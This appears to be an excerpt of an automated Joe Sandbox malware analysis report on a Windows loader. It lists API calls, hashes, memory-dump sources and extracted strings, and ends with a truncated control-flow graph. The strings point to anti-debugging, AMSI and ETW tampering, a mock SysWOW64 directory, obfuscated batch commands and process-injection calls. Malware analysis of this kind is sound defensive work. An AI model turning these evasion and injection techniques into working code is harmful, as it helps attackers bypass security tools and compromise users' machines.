                                                                                                                                      • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                                                                      • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                                      • API String ID: 4072585319-445027087
                                                                                                                                      • Opcode ID: ae35c55d7c659ddd8094db45f0db5db96092bb79666b9856093587f4a8aba7f7
                                                                                                                                      • Instruction ID: 051cf75b71c1c10f34944b81dff5d831ecf324caf4adab2fb0e9ed19d5a12327
                                                                                                                                      • Opcode Fuzzy Hash: ae35c55d7c659ddd8094db45f0db5db96092bb79666b9856093587f4a8aba7f7
                                                                                                                                      • Instruction Fuzzy Hash: 00115775640208AFEB15EFA4DC42FAFB7ADEB48710F418861B908D7640DA70AA149B60
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 02C48020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02C48090,?,?,00000000,?,02C47A06,ntdll,00000000,00000000,02C47A4B,?,?,00000000), ref: 02C4805E
                                                                                                                                        • Part of subcall function 02C48020: GetModuleHandleA.KERNELBASE(?), ref: 02C48072
                                                                                                                                        • Part of subcall function 02C480C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02C48150,?,?,00000000,00000000,?,02C48069,00000000,KernelBASE,00000000,00000000,02C48090), ref: 02C48115
                                                                                                                                        • Part of subcall function 02C480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02C4811B
                                                                                                                                        • Part of subcall function 02C480C8: GetProcAddress.KERNEL32(?,?), ref: 02C4812D
                                                                                                                                      • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02C47A27
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                                                                      • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                                      • API String ID: 4072585319-445027087
                                                                                                                                      • Opcode ID: e5564f7677e7f2b9eceea7002fccd1256339dce290e404dc8ea6cbbec97d27de
                                                                                                                                      • Instruction ID: 8a7e3501d507530ca41b5bc3210e44cf1c66fff67f7d9fe97f722eb5c64616ca
                                                                                                                                      • Opcode Fuzzy Hash: e5564f7677e7f2b9eceea7002fccd1256339dce290e404dc8ea6cbbec97d27de
                                                                                                                                      • Instruction Fuzzy Hash: 40116975640208AFEB15EFA4DC42F9FB7BDEB4C710F418861B908D7640DB70AA14DB60
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 02C48020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02C48090,?,?,00000000,?,02C47A06,ntdll,00000000,00000000,02C47A4B,?,?,00000000), ref: 02C4805E
                                                                                                                                        • Part of subcall function 02C48020: GetModuleHandleA.KERNELBASE(?), ref: 02C48072
                                                                                                                                        • Part of subcall function 02C480C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02C48150,?,?,00000000,00000000,?,02C48069,00000000,KernelBASE,00000000,00000000,02C48090), ref: 02C48115
                                                                                                                                        • Part of subcall function 02C480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02C4811B
                                                                                                                                        • Part of subcall function 02C480C8: GetProcAddress.KERNEL32(?,?), ref: 02C4812D
                                                                                                                                      • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02C482C5
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: HandleModule$AddressProc$MemoryReadVirtual
                                                                                                                                      • String ID: ntdll$yromeMlautriVdaeRtN
                                                                                                                                      • API String ID: 2521977463-737317276
                                                                                                                                      • Opcode ID: f2c1816b2a1240c70e47ef0060d2f53b8ff4d4c0364c91907f96afc3186cceff
                                                                                                                                      • Instruction ID: 36307dbee292e845413d3c3ec9938e39132e24f097807f38d3ba528c5d237355
                                                                                                                                      • Opcode Fuzzy Hash: f2c1816b2a1240c70e47ef0060d2f53b8ff4d4c0364c91907f96afc3186cceff
                                                                                                                                      • Instruction Fuzzy Hash: 35016975600208AFEB10EFA8DC41EAF77FEEB49700F414960F808D7600DA70E9109B64
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 02C48020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02C48090,?,?,00000000,?,02C47A06,ntdll,00000000,00000000,02C47A4B,?,?,00000000), ref: 02C4805E
                                                                                                                                        • Part of subcall function 02C48020: GetModuleHandleA.KERNELBASE(?), ref: 02C48072
                                                                                                                                        • Part of subcall function 02C480C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02C48150,?,?,00000000,00000000,?,02C48069,00000000,KernelBASE,00000000,00000000,02C48090), ref: 02C48115
                                                                                                                                        • Part of subcall function 02C480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02C4811B
                                                                                                                                        • Part of subcall function 02C480C8: GetProcAddress.KERNEL32(?,?), ref: 02C4812D
                                                                                                                                      • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02C47D74
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: HandleModule$AddressProc$MemoryVirtualWrite
                                                                                                                                      • String ID: Ntdll$yromeMlautriVetirW
                                                                                                                                      • API String ID: 2719805696-3542721025
                                                                                                                                      • Opcode ID: d0e0a57f955e2a7dfaac7d7e20f528569a92baafa90cf5c6a8e22d1b721fb08b
                                                                                                                                      • Instruction ID: 25b224829f9682d1badafaf1f60334875e4e4a6d12f1212474b81060c6ce34b5
                                                                                                                                      • Opcode Fuzzy Hash: d0e0a57f955e2a7dfaac7d7e20f528569a92baafa90cf5c6a8e22d1b721fb08b
                                                                                                                                      • Instruction Fuzzy Hash: 34018CB5610208AFEB10EFA8DC45FAFB7FDEB48700F514820F408D7A80CA70A9149F60
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 02C48020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02C48090,?,?,00000000,?,02C47A06,ntdll,00000000,00000000,02C47A4B,?,?,00000000), ref: 02C4805E
                                                                                                                                        • Part of subcall function 02C48020: GetModuleHandleA.KERNELBASE(?), ref: 02C48072
                                                                                                                                        • Part of subcall function 02C480C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02C48150,?,?,00000000,00000000,?,02C48069,00000000,KernelBASE,00000000,00000000,02C48090), ref: 02C48115
                                                                                                                                        • Part of subcall function 02C480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02C4811B
                                                                                                                                        • Part of subcall function 02C480C8: GetProcAddress.KERNEL32(?,?), ref: 02C4812D
                                                                                                                                      • NtUnmapViewOfSection.NTDLL(?,?), ref: 02C48529
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
• Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
• Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2c30000_x.jbxd
Similarity
• API ID: HandleModule$AddressProc$SectionUnmapView
• String ID: noitceSfOweiVpamnUtN$ntdll
• API String ID: 3503870465-2520021413
• Opcode ID: 1885abc288bd3555802afb84107b3268b4863d88c79648948a015d4fb70baac9
• Instruction ID: 6166b5f20e1162142a0a5916b154a3a61d02b7b8aa2ebb45cb8688601656f3d9
• Opcode Fuzzy Hash: 1885abc288bd3555802afb84107b3268b4863d88c79648948a015d4fb70baac9
• Instruction Fuzzy Hash: 94014B74A40204AFFB15EFA4DC46B5EB7BEFB49B10F914960B40897A40DA70AA10AA60
APIs
• RtlInitUnicodeString.NTDLL(?,?), ref: 02C4DA6C
• RtlDosPa.N(00000000,?,00000000,00000000,00000000,02C4DABE), ref: 02C4DA82
• NtDeleteFile.NTDLL(?), ref: 02C4DAA1
Memory Dump Source
• Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
• Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2c30000_x.jbxd
Similarity
• API ID: DeleteFileInitStringUnicode
• String ID:
• API String ID: 3559453722-0
• Opcode ID: 9d420d2cd237ec896246750985b00462cbdfb39342c7ea844ad94f25a70c4ddf
• Instruction ID: b71fda800dcdb889988fba4649aa244d1cf56b33cf358c38f820a38d7b5e5990
• Opcode Fuzzy Hash: 9d420d2cd237ec896246750985b00462cbdfb39342c7ea844ad94f25a70c4ddf
• Instruction Fuzzy Hash: D6014F75988248AEEB06FAA09941BCE77B9AB45704F5004A3A241E6081DE74AB049B25
APIs
  • Part of subcall function 02C34ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02C34EDA
• RtlInitUnicodeString.NTDLL(?,?), ref: 02C4DA6C
• RtlDosPa.N(00000000,?,00000000,00000000,00000000,02C4DABE), ref: 02C4DA82
• NtDeleteFile.NTDLL(?), ref: 02C4DAA1
  • Part of subcall function 02C34C0C: SysFreeString.OLEAUT32(02C4E950), ref: 02C34C1A
Memory Dump Source
• Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
• Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2c30000_x.jbxd
Similarity
• API ID: String$AllocDeleteFileFreeInitUnicode
• String ID:
• API String ID: 2841551397-0
• Opcode ID: 6a5fcf6f8215be6e873fb128ae07f52ca964285ca88f285c523de84c829bfb63
• Instruction ID: 4890b99a878fa205ed210bfd2895b6a6b4837dff0fef5dba64d4858bbfa16f02
• Opcode Fuzzy Hash: 6a5fcf6f8215be6e873fb128ae07f52ca964285ca88f285c523de84c829bfb63
• Instruction Fuzzy Hash: 3A01EC71A44208AAEB15FAE0DD52FCEB7BDEB48B00F504472A601E6180EB74AB049A64
APIs
  • Part of subcall function 02C46CF4: CLSIDFromProgID.OLE32(00000000,?,00000000,02C46D41,?,?,?,00000000), ref: 02C46D21
• CoCreateInstance.OLE32(?,00000000,00000005,02C46E34,00000000,00000000,02C46DB3,?,00000000,02C46E23), ref: 02C46D9F
Memory Dump Source
• Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
• Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2c30000_x.jbxd
Similarity
• API ID: CreateFromInstanceProg
• String ID:
• API String ID: 2151042543-0
• Opcode ID: 45c33bce37da15703d19256b431596406120267975f071da5f2602af0b081541
• Instruction ID: ce54c19730cf883a3395bfe2f4b23465726eacc8bd253c857aa32102f977f7b5
• Opcode Fuzzy Hash: 45c33bce37da15703d19256b431596406120267975f071da5f2602af0b081541
• Instruction Fuzzy Hash: FF012631208744AEF706DFA4DC5296FBBFDEB4AB10B724835F901E2680EE348E00D960
APIs
• InetIsOffline.URL(00000000,00000000,02C5AFA1,?,?,?,000002F7,00000000,00000000), ref: 02C4ECAE
  • Part of subcall function 02C48824: LoadLibraryA.KERNEL32(00000000,00000000,02C4890B), ref: 02C48858
  • Part of subcall function 02C48824: FreeLibrary.KERNEL32(74F60000,00000000,02C91388,Function_000065D8,00000004,02C91398,02C91388,05F5E0FF,00000040,02C9139C,74F60000,00000000,00000000,00000000,00000000,02C4890B), ref: 02C488EB
  • Part of subcall function 02C4EB94: GetModuleHandleW.KERNEL32(KernelBase,?,02C4EF98,UacInitialize,02C9137C,02C5AFD8,OpenSession,02C9137C,02C5AFD8,ScanBuffer,02C9137C,02C5AFD8,ScanString,02C9137C,02C5AFD8,Initialize), ref: 02C4EB9A
  • Part of subcall function 02C4EB94: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02C4EBAC
  • Part of subcall function 02C4EBF0: GetModuleHandleW.KERNEL32(KernelBase), ref: 02C4EC00
  • Part of subcall function 02C4EBF0: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02C4EC12
  • Part of subcall function 02C4EBF0: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02C4EC29
  • Part of subcall function 02C37E18: GetFileAttributesA.KERNEL32(00000000,?,02C4F8CC,ScanString,02C9137C,02C5AFD8,OpenSession,02C9137C,02C5AFD8,ScanString,02C9137C,02C5AFD8,UacScan,02C9137C,02C5AFD8,UacInitialize), ref: 02C37E23
  • Part of subcall function 02C3C2EC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02D858C8,?,02C4FBFE,ScanBuffer,02C9137C,02C5AFD8,OpenSession,02C9137C,02C5AFD8,ScanBuffer,02C9137C,02C5AFD8,OpenSession), ref: 02C3C303
  • Part of subcall function 02C4DBB0: RtlDosPa.N(00000000,?,00000000,00000000,00000000,02C4DC80), ref: 02C4DBEB
  • Part of subcall function 02C4DBB0: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02C4DC80), ref: 02C4DC1B
  • Part of subcall function 02C4DBB0: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02C4DC30
  • Part of subcall function 02C4DBB0: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02C4DC5C
  • Part of subcall function 02C4DBB0: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02C4DC65
  • Part of subcall function 02C37E3C: GetFileAttributesA.KERNEL32(00000000,?,02C52A49,ScanString,02C9137C,02C5AFD8,OpenSession,02C9137C,02C5AFD8,ScanBuffer,02C9137C,02C5AFD8,OpenSession,02C9137C,02C5AFD8,Initialize), ref: 02C37E47
  • Part of subcall function 02C37FD0: CreateDirectoryA.KERNEL32(00000000,00000000,?,02C52BE7,OpenSession,02C9137C,02C5AFD8,ScanString,02C9137C,02C5AFD8,Initialize,02C9137C,02C5AFD8,ScanString,02C9137C,02C5AFD8), ref: 02C37FDD
  • Part of subcall function 02C4DACC: RtlDosPa.N(00000000,?,00000000,00000000,00000000,02C4DB9E), ref: 02C4DB0B
  • Part of subcall function 02C4DACC: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02C4DB45
  • Part of subcall function 02C4DACC: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02C4DB72
  • Part of subcall function 02C4DACC: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02C4DB7B
  • Part of subcall function 02C487A0: LoadLibraryW.KERNEL32(bcrypt,?,00000884,00000000,02C913A4,02C4A3C7,ScanString,02C913A4,02C4A77C,ScanBuffer,02C913A4,02C4A77C,Initialize,02C913A4,02C4A77C,UacScan), ref: 02C487B4
  • Part of subcall function 02C487A0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02C487CE
  • Part of subcall function 02C487A0: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000884,00000000,02C913A4,02C4A3C7,ScanString,02C913A4,02C4A77C,ScanBuffer,02C913A4,02C4A77C,Initialize), ref: 02C4880A
  • Part of subcall function 02C4870C: LoadLibraryW.KERNEL32(amsi), ref: 02C48715
  • Part of subcall function 02C4870C: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02C48774
• Sleep.KERNEL32(00002710,00000000,00000000,ScanBuffer,02C9137C,02C5AFD8,OpenSession,02C9137C,02C5AFD8,ScanBuffer,02C9137C,02C5AFD8,OpenSession,02C9137C,02C5AFD8,02C5B330), ref: 02C549B7
  • Part of subcall function 02C4DA44: RtlInitUnicodeString.NTDLL(?,?), ref: 02C4DA6C
  • Part of subcall function 02C4DA44: RtlDosPa.N(00000000,?,00000000,00000000,00000000,02C4DABE), ref: 02C4DA82
  • Part of subcall function 02C4DA44: NtDeleteFile.NTDLL(?), ref: 02C4DAA1
• MoveFileA.KERNEL32(00000000,00000000), ref: 02C54BB7
• MoveFileA.KERNEL32(00000000,00000000), ref: 02C54C0D
Strings
Memory Dump Source
• Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
• Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2c30000_x.jbxd
Similarity
• API ID: File$Library$AddressFreeLoadModuleProc$AttributesCloseCreateHandleMove$CheckDebuggerDeleteDirectoryInetInformationInitNameOfflineOpenPresentQueryReadRemoteSleepStringUnicodeWrite
• String ID: .url$@echo offset "EPD=sPDet "@% or%e%.%c%%h%.o%o%or$@echo offset "MJtc=Iet "@%r%e%%c%r%h%%o%$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\aken.pif$C:\Users\Public\alpha.pif$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\svchost.exe$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FX.c$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NEO.c$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$advapi32$bcrypt$dbgcore$endpointdlp$http$ieproxy$kernel32$lld.SLITUTEN$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$sys.thgiseurt$tquery$wintrust$@echo off@% %e%%c%o%h% %o%rrr% %%o%%f% %f%o%s%
• API String ID: 3130226682-181751239
• Opcode ID: 584fcee3f222ca36a9c1eeac2af0b8caf54f5117037de40186bf3c5d17542706
• Instruction ID: c8a2980aadec35de7d744c67192e14147b4f3356bf781e7e0f45c486820de084
• Opcode Fuzzy Hash: 584fcee3f222ca36a9c1eeac2af0b8caf54f5117037de40186bf3c5d17542706
• Instruction Fuzzy Hash: 30243275A501688FDB2AEB64DC80ADE73BAFF85300F1045E2E409A7354DA31EE81EF55

Control-flow Graph

• Executed
• Not Executed
control_flow_graph (rendered graph; the textual node/edge dump is summarized here, and its last block is cut off in the page source)
• Block 5348: 2c57878-2c57c67, repeated calls to 2c3480c, 2c3494c, 2c346a4, 2c34798, 2c48824, then call 2c34898; edges 5348->5463, 5348->5464
• Block 5463: 2c58af1-2c58c74, same call pattern, then call 2c34898; edges 5463->5553, 5463->5554
• Block 5464: 2c57c6d-2c57e40, same call pattern, then call 2c34d20, call 2c34d9c, CreateProcessAsUserW; edges 5464->5571, 5464->5572
• Block 5553: 2c59420-2c5aa25, same call pattern repeated many times (including call 2c48824 * 16), then call 2c47b98, call 2c4818c, ExitProcess
• Block 5554: 2c58c7a-2c58c89, call 2c34898; edge 5554->5553
• Block 5563: 2c58c8f-2c58f62, same call pattern (dump truncated)
• Block 5571: 2c57e42-2c57eb9, same call pattern
• Block 5572: 2c57ebe-2c57fc9, same call pattern
2c48824 call 2c4e540 call 2c3480c call 2c3494c call 2c346a4 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c37e18 5554->5563 5821 2c58f68-2c59215 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c34d8c * 2 call 2c34734 call 2c4dacc 5563->5821 5822 2c5921a-2c5941b call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c349a4 call 2c48bb0 5563->5822 5571->5572 5674 2c57fd0-2c582f0 call 2c349a4 call 2c4dc90 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c4cfa4 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 5572->5674 5675 2c57fcb-2c57fce 5572->5675 5991 2c582f2-2c58304 call 2c48584 5674->5991 5992 2c58309-2c58aec call 2c3480c call 2c3494c call 2c346a4 call 2c34798 
